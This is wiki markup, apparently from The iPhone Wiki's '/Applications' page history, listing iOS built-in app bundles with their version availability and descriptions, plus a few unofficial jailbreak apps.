| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Displays a video continuously when the device is not being used. Invoke with a file called Demo.mov in the user directory ([[/private/var/root]] for iOS 1.1.2 and lower, [[/private/var/mobile]] for iOS 1.1.3 and later). Used by Apple Stores.<br />
|-<br />
| {{ipfw|Diagnostics.app}} (Not to be confused with iOS Diagnostics.app, Diagnostics.app currently serves no purpose)<br />
| {{ipfw|Diagnostics.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Currently, this serves no clear purpose. It has lorem ipsum inside it, and accept and decline buttons.<br />
|-<br />
| {{ipfw|FacebookAccountMigrationDialog.app}}<br />
| {{ipfw|FacebookAccountMigrationDialog.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Facebook service.<br />
|-<br />
| {{ipfw|FaceTime.app}}<br />
| {{ipfw|FaceTime.app}}<br />
| No Apple TV Version<br />
| FaceTime<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| [[FaceTime]] application for devices running iOS 7 or later.<br />
|-<br />
| {{ipfw|Family.app}}<br />
| {{ipfw|Family.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Application for Family Sharing. Doesn't appear to work yet.<br />
|-<br />
| {{ipfw|FieldTest.app}}<br />
| {{ipfw|FieldTest.app}} (3G only)<br />
| No Apple TV Version<br />
| <br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{partial|See notes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app for checking network parameters; Can be accessed by dialing [[Phone.app codes|<code>*3001#12345#*</code>]]; Retired in 4.0, returns in 4.1 providing only the cellular network RSSI display. iOS 4.2 brings all features back.<br />
|-<br />
| {{ipfw|GameCenterUIService.app}}<br />
| {{ipfw|GameCenterUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|GameCenter~iphone.app}}<br />
| {{ipfw|GameCenter~ipad.app}}<br />
| No Apple TV Version<br />
| Game Center<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{partial|4.1+}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Game Center.<br />
|-<br />
| {{ipfw|Health.app}}<br />
| {{ipfw|Health.app}}<br />
| No Apple TV Version<br />
| Health<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| The Health app. Works as the center of HealthKit enabled apps.<br />
|-<br />
| {{ipfw|HealthPrivacyService.app}}<br />
| {{ipfw|HealthPrivacyService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| A service for Health.app, apparently in place to protect your privacy.<br />
|-<br />
| {{ipfw|iAdOptOut.app}}<br />
| {{ipfw|iAdOptOut.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|iBooks.app}}<br />
| {{ipfw|iBooks.app}}<br />
| No Apple TV Version<br />
| iBooks<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| iBooks app built into iOS 8.<br />
|-<br />
| {{ipfw|InCallService.app}}<br />
| {{ipfw|InCallService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|iOS Diagnostics.app}}<br />
| {{ipfw|iOS Diagnostics.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| This can be accessed through Safari; just type diags:// into the URL bar.<br />
|-<br />
| {{ipfw|iPodOut.app}}<br />
| {{ipfw|iPodOut.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| Hidden app for iPodOut functionality with third party equipment such as car entertainment systems. Provides a media selection and notification view interface through the video output.<br />
|-<br />
| {{ipfw|iTunes.app}} (Not to be confused with MobileStore.app, the iTunes Store app)<br />
| {{ipfw|iTunes.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app. Crashes on startup. Purpose not known.<br />
|-<br />
| {{ipfw|kbd.app}}<br />
| {{ipfw|kbd.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| <br />
|-<br />
| {{ipfw|MailCompositionService.app}}<br />
| {{ipfw|MailCompositionService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Maps~iphone.app}} (Maps.app on iOS 7)<br />
| {{ipfw|Maps~ipad.app}}<br />
| No Apple TV Version<br />
| Maps<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Maps.<br />
|-<br />
| {{ipfw|MessagesNotificationViewService.app}}<br />
| {{ipfw|MessagesNotificationViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
|-<br />
| {{ipfw|MessagesViewService.app}}<br />
| {{ipfw|MessagesViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|MobileCal.app}}<br />
| {{ipfw|MobileCal.app}}<br />
| No Apple TV Version<br />
| Calendar<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Calendar.<br />
|-<br />
| {{ipfw|MobileMail.app}}<br />
| {{ipfw|MobileMail.app}}<br />
| No Apple TV Version<br />
| Mail<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Mail. Updated in iOS 4 and iOS 7.<br />
|-<br />
| {{ipfw|MobileMusicPlayer.app}}<br />
| {{ipfw|MobileMusicPlayer.app}}<br />
| No Apple TV Version<br />
| iPod; Music; Videos<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| iPod/Music/Videos. Uses the '''[[Application Roles]]''' feature to have more than one icon. Split into separate Music/Videos apps since iOS 5.<br />
|-<br />
| {{ipfw|MobileNotes.app}}<br />
| {{ipfw|MobileNotes.app}}<br />
| No Apple TV Version<br />
| Notes<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Notes.<br />
|-<br />
| {{ipfw|MobilePhone.app}}<br />
| {{ipfw|MobilePhone.app}} (iPad 2 and newer only, running iOS 6 and under)<br />
| No Apple TV Version<br />
| Phone; FaceTime for iOS 6 and under<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Only FaceTime is shown on the iPad and iPod touch. On iOS 7 FaceTime is an independent application. Uses the '''Application Roles''' feature to have more than one icon.<br />
|-<br />
| {{ipfw|MobileReplayer.app}}<br />
| {{ipfw|MobileReplayer.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| MobileReplayer's purpose isn't known. Crashes upon startup.<br />
|-<br />
| {{ipfw|MobileSafari.app}}<br />
| {{ipfw|MobileSafari.app}}<br />
| No Apple TV Version<br />
| Safari<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Mobile Safari web browser.<br />
|-<br />
| {{ipfw|MobileSlideShow.app}}<br />
| {{ipfw|MobileSlideShow.app}}<br />
| No Apple TV Version<br />
| Photos (iOS 4 and above); Photos, Camera (older OS versions)<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Photo Albums, Places, Faces*, Events* and Import°.<br />
<br />
<nowiki>* </nowiki>Mac only.<br />
<br />
° with iPad Camera Connection Kit<br />
|-<br />
| {{ipfw|MobileSMS.app}}<br />
| {{ipfw|MobileSMS.app}}<br />
| No Apple TV Version<br />
| [[Messages]]; Text (iPhone OS < 2.2.1)<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| SMS, MMS and [[iMessage]]<br />
|-<br />
| {{ipfw|MobileStore.app}}<br />
| {{ipfw|MobileStore.app}}<br />
| No Apple TV Version<br />
| iTunes Store (iTunes prior to iOS 7)<br />
| {{partial|1.1}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| iTunes Store and Ping.<br />
|-<br />
| {{ipfw|MobileTimer.app}} (MobileTimer~iphone.app on iOS 6 only)<br />
| {{ipfw|MobileTimer~ipad.app}} (only from iOS 6)<br />
| No Apple TV Version<br />
| Clock<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| World Clocks, Alarms, Stopwatch and countdown Timer.<br />
|-<br />
| {{ipfw|Music~iphone.app}} (Music.app on iOS 7)<br />
| {{ipfw|Music~ipad.app}}<br />
| No Apple TV Version<br />
| Music<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Previously part of MobileMusicPlayer.app. Icon is identical to the one previously only displayed on iPod touches.<br />
|-<br />
| {{ipfw|Nike.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Nike+iPod<br />
| {{no}}<br />
| {{partial|2.2.1}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Nike+iPod. Only on applicable devices (iPod touch 2G, iPhone 3G, and newer) when enabled in Settings.<br />
|-<br />
| {{ipfw|Podcasts.app}}<br />
| {{ipfw|Podcasts.app}}<br />
| No Apple TV Version<br />
| Podcasts<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Podcasts app built into iOS 8.<br />
|-<br />
| {{ipfw|PreBoard.app}}<br />
| {{ipfw|PreBoard.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown, crashes at start.<br />
|-<br />
| {{ipfw|Preferences.app}}<br />
| {{ipfw|Preferences.app}}<br />
| No Apple TV Version<br />
| Settings<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Settings.<br />
|-<br />
| {{ipfw|PrintStatus.app}}<br />
| {{ipfw|PrintStatus.app}}<br />
| No Apple TV Version<br />
| Print Center<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Print Center.<br />
|-<br />
| {{ipfw|quicklookd.app}}<br />
| {{ipfw|quicklookd.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Reminders.app}}<br />
| {{ipfw|Reminders.app}}<br />
| No Apple TV Version<br />
| Reminders<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Reminders application.<br />
|-<br />
| {{ipfw|Setup.app}}<br />
| {{ipfw|Setup.app}}<br />
| No Apple TV Version<br />
| Setup<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden setup app. Opens automatically after a restore.<br />
|-<br />
| {{ipfw|Passbook.app}} (Shoebox.app prior to iOS 7)<br />
| No iPad Version<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Passbook.<br />
|-<br />
| {{ipfw|SiriViewService.app}}<br />
| {{ipfw|SiriViewService.app}}<br />
| No Apple TV Version<br />
| Siri<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| [[Siri]] controller.<br />
|-<br />
| {{ipfw|ShoeboxUIService.app}} (PassbookUIService.app on iOS 7)<br />
| {{ipfw|ShoeboxUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
|<br />
|-<br />
| {{ipfw|SocialUIService.app}}<br />
| {{ipfw|SocialUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Stocks.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Stocks<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Stocks. Updated in iPhone OS 3.0 and iOS 7.<br />
|-<br />
| {{ipfw|TencentWeiboAccountMigrationDialog.app}}<br />
| {{ipfw|TencentWeiboAccountMigrationDialog.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Account Migration (??) for Tencent Weibo Accounts<br />
|-<br />
| {{ipfw|TrustMe.app}}<br />
| {{ipfw|TrustMe.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Related to SSL and certificates.<br />
|-<br />
| {{ipfw|UserAuthentication.app}}<br />
| {{ipfw|UserAuthentication.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown app. Does nothing when launched. Might be used for the iOS 8 Touch ID API.<br />
|-<br />
| {{ipfw|Videos.app}}<br />
| {{ipfw|Videos.app}}<br />
| No Apple TV Version<br />
| Videos<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Previously part of MobileMusicPlayer.app.<br />
|-<br />
| {{ipfw|VoiceMemos.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Voice Memos<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Voice Memos. Requires <code>encode-aac</code> capability and a microphone.<br />
|-<br />
| {{ipfw|Weather.app}}<br />
| {{ipfw|Weather.app}}<br />
| No Apple TV Version<br />
| Weather<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Weather. Updated for fast app switching support and hourly forecast and in iOS 6.<br />
|-<br />
| {{ipfw|Web.app}}<br />
| {{ipfw|Web.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Runs fullscreen web clips.<br />
|-<br />
| {{ipfw|WebApp1.app}}<br />
| {{ipfw|WebApp1.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown purpose, crashes on startup<br />
|-<br />
| {{ipfw|WebContentAnalysisUI.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|WebSheet.app}}<br />
| {{ipfw|WebSheet.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Used for overlaying web data. Usually for logging in to Wi-Fi Hotspots which use forced webpages to request user data.<br />
|-<br />
| {{ipfw|WebViewService.app}} (WebUIService prior to iOS 7)<br />
| {{ipfw|WebViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|WhatsNew.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| ?<br />
|-<br />
| {{ipfw|YouTube.app}}<br />
| {{ipfw|YouTube.app}}<br />
| No Apple TV Version<br />
| YouTube<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| Watch [http://youtube.com YouTube] videos; removed in iOS 6 beta 4 according with the Google License.<br />
|}<br />
<br />
==== Unofficial Apps ====<br />
These application bundles are not present on an unmodified system and are generally installed via a PC utility, manually or through a package. More applications may be installed after jailbreak.<br />
* [[Installer.app]] (AppTapp Installer)<br />
* [[blackra1n.app]] ([[blackra1n]] and [[limera1n]])<br />
* [[Cydia.app]] (Cydia Installer)<br />
<br />
=== Files ===<br />
(none)<br />
<br />
== Parents ==<br />
{{parent}}<br />
<br />
[[Category:Filesystem]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=/Applications&diff=41343
/Applications
2014-06-19T18:57:35Z
<p>Ryandolan123: fixed small issues with page</p>
<hr />
<div>== Summary ==<br />
This is where all of the pre-installed native apps, as well as native jailbreak apps (from Cydia and elsewhere), are installed. They can't be deleted under normal circumstances. One can delete them on a jailbroken device through some sort of file-management tool such as SSH or iFile, although doing this is highly unrecommended as they can't be re-installed.<br />
<br />
New user apps are installed via iTunes or the App Store in the [[/private/var/mobile/Applications]] folder.<br />
<br />
== Children ==<br />
=== Folders ===<br />
*{{ipfw|Utilities}} <br />
==== Native Apps ====<br />
{| class="wikitable sortable" style="table-layout: fixed; border-collapse: collapse;" border="1"<br />
|-<br />
! Folder name (generic)<br />
! Folder name ([[iPad]] version)<br />
! Folder name ([[Apple TV]] version)<br />
! Application name<br />
! 1.x<br />
! 2.x<br />
! 3.x<br />
! 4.x <br />
! 5.x<br />
! 6.x<br />
! 7.x<br />
! 8.x (beta)<br />
! Description<br />
|-<br />
| {{ipfw|AACredentialRecoveryDialog.app}}<br />
| ?<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|AdSheet.app}} (iAd.app in iOS 8)<br />
| {{ipfw|AdSheet~ipad.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app for [[iAd]] support (Both included on iPad)<br />
|-<br />
| No iPhone or iPod touch version<br />
| No iPad Version<br />
| {{ipfw|AppleTV.app}}<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{partial|4.1.1/4.2.1+}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| The Apple TV's equivalent of [[:/System/Library/CoreServices/SpringBoard.app|SpringBoard]]. Used on [[iOS]] 4.2 and higher. Prior to 4.2.1, it was known as Lowtide.app.<br />
|-<br />
| {{ipfw|AppStore.app}}<br />
| {{ipfw|AppStore.app}}<br />
| No Apple TV Version<br />
| App Store<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Client for the [[App Store]]<br />
|-<br />
| {{ipfw|AskPermissionUI.app}}<br />
| {{ipfw|AskPermissionUI.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| App for the UI for Family Sharing purchase confirmations<br />
|-<br />
| {{ipfw|BugReporter.app}}<br />
| {{ipfw|BugReporter.app}}<br />
| No Apple TV Version<br />
| Bug Reporter<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| An app for conveniently reporting bugs, specific to beta releases starting with iOS 8.<br />
|-<br />
| {{ipfw|Calculator.app}}<br />
| No iPad version<br />
| No Apple TV Version<br />
| Calculator<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Calculator. Icon evolved over major OS releases. Landscape scientific mode added in iOS 2.0.<br />
|-<br />
| {{ipfw|Camera.app}}<br />
| {{ipfw|Camera.app}} ([[iPad 2]] and newer only)<br />
| No Apple TV Version<br />
| Camera<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Camera. Split from {{ipfw|MobileSlideShow.app}} starting with iOS 4.0.<br />
|-<br />
| {{ipfw|Compass.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Compass<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Compass. Only available on [[Magnetometer|qualifying devices]].<br />
|-<br />
| {{ipfw|CompassCalibrationViewService.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|Contacts~iphone.app}} (MobileAddressBook.app before iOS 4)<br />
| {{ipfw|Contacts~ipad.app}}<br />
| No Apple TV Version<br />
| Contacts<br />
| {{partial}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Contacts.<br />
|-<br />
| {{ipfw|Copilot.app}}<br />
| ?<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| ?<br />
|-<br />
| {{ipfw|DDActionsService.app}}<br />
| {{ipfw|DDActionsService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|DemoApp.app}}<br />
| {{ipfw|DemoApp.app}}<br />
| No Apple TV Version<br />
| <br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Displays a video continuously when the device is not being used. Invoke with a file called Demo.mov in the user directory ([[/private/var/root]] for iOS 1.1.2 and lower, [[/private/var/mobile]] for iOS 1.1.3 and later). Used by Apple Stores.<br />
|-<br />
| {{ipfw|Diagnostics.app}} (Not to be confused with iOS Diagnostics.app, Diagnostics.app currently serves no purpose)<br />
| {{ipfw|Diagnostics.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Currently, this serves no clear purpose. It has lorem ipsum inside it, and accept and decline buttons.<br />
|-<br />
| {{ipfw|FacebookAccountMigrationDialog.app}}<br />
| {{ipfw|FacebookAccountMigrationDialog.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Facebook service.<br />
|-<br />
| {{ipfw|FaceTime.app}}<br />
| {{ipfw|FaceTime.app}}<br />
| No Apple TV Version<br />
| FaceTime<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| [[FaceTime]] application for devices running iOS 7 or later.<br />
|-<br />
| {{ipfw|Family.app}}<br />
| {{ipfw|Family.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Application for Family Sharing. Doesn't appear to work yet.<br />
|-<br />
| {{ipfw|FieldTest.app}}<br />
| {{ipfw|FieldTest.app}} (3G only)<br />
| No Apple TV Version<br />
| <br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{partial|See notes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
